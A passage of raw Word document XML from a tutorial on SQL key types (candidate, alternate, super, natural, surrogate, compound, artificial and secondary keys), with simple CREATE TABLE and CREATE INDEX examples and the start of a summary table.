        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniquely identify</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> any record in a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43348980"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518BCACA"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an be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple candidate keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF98AC"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One of them becomes the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C0F0E6"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E68F7C"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a Student table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101B390E"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udent_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F68799E"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mail Both can be candidate keys if they are unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E90B1" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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D785FB5">
          <v:rect id="_x0000_i2937" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D1BE86"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6. Alternate Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24870DEC"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2DD825"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andidate keys </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not chosen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9F33C"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F851EF0"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Can be used as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5100A45E"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ill uniquely identifies records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE996B"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lastRenderedPageBreak/>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65406D98"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REATE TABLE Student (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9443F"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tudent_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C1189"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email VARCHAR(100) UNIQUE  -- Alternate Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B976EF"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1D147137" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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DFC7FD0">
          <v:rect id="_x0000_i2938" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447FBE9"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7. Super Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4897E493"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628A775"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set of columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniquely identify</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each row. It may include </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extra attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> not necessary for uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ACF4FD"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F84AB"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 a User table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD19081"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r_id → Candidate key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA16C6B"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r_id + email → Super key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC9309E" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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AC03F55">
          <v:rect id="_x0000_i2939" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="735AFEE1"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8. Natural Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0E3A5"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2859E59E"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key that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>derived from real-world data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCAAC7A"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49478223"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as business meaning (like SSN, email, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57584CEF"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y not be ideal for indexing or changing systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C4CF4"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E712E91"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REATE TABLE Citizen (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47144951"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ssn VARCHAR(20) PRIMARY KEY  -- SSN is a natural key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D7DB1"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67DBE443" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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C4A6198">
          <v:rect id="_x0000_i2940" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D0CD01"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9. Surrogate Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55AA6E"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23781C99"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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>artificial</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> key created for uniquely identifying a record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDDCDE"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F0ED6"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ypically an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-incremented ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6728E794"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 business meaning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27490FAE"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB43CE"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REATE TABLE Product (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3494F527"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id INT PRIMARY KEY AUTO_INCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D9F4D"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    name VARCHAR(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41252769"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4965CA33" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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C8EC329">
          <v:rect id="_x0000_i2941" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="610AE54F"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10. Compound Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0BFF48"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D6977"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d interchangeably with composite key, it is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>combination of multiple columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to uniquely identify a row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3BAE4"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5B3A9"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ame as composite key example above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA5DBF" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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BE1C58D">
          <v:rect id="_x0000_i2942" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AB2BE6"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11. Artificial Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BFE348"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F1B00"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key created to replace a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>natural key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when no suitable natural key exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3B7A50"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D00216"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Same as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>surrogate key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DECFA94"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Used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>simplifying joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>indexing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755F1E2" w14:textId="77777777" w:rsidR="00E74E18" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E74E1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F647AE8">
          <v:rect id="_x0000_i2943" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D3727"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12. Secondary Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA9BB05"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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36787F5D"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used for searching and querying efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BAF6BD"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A989656"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lastRenderedPageBreak/>
        <w:t>Does not enforce uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC4DBC"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ypically used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>indexing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF261A"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F57036"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reating an index on a column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEAD5F"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REATE INDEX idx_emp_name ON Employee(emp_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC12ED3" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="00E74E18">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B8A54A" w14:textId="148AB078" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="00E74E1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All SQL Keys Explain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75"/>
        <w:gridCol w:w="8429"/>
      </w:tblGrid>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="3DA93A75" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E67590" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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 Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4138DDFE" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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102212" w:rsidRPr="00CE4B95" w14:paraId="7A879709" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20346489" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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1. Primary Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1501A0EE" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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niquely identifies each record. Only one per table. Not NULL &amp; unique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="72E60515" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EBA2689" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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2. Foreign Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06652FC3" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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reates a relationship between tables. Refers to the primary key in another table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="7DDC7FBD" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5DEE23" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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3. Unique Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1785AA21" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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sures column values are unique. Allows one NULL. Multiple allowed per table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="04007A5E" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F1D6801" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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4. Composite Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="762BA907" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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bines two or more columns to form a unique identifier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="4F4E876E" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21630F57" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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5. Candidate Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70503001" w14:textId="77777777" w:rsidR="00102212" w:rsidRPr="00CE4B95" w:rsidRDefault="00102212" w:rsidP="0010221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column or set of columns that can qualify as a primary key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102212" w:rsidRPr="00CE4B95" w14:paraId="01E9955E" w14:textId="77777777" w:rsidTr="00102212">
        <w:trPr>
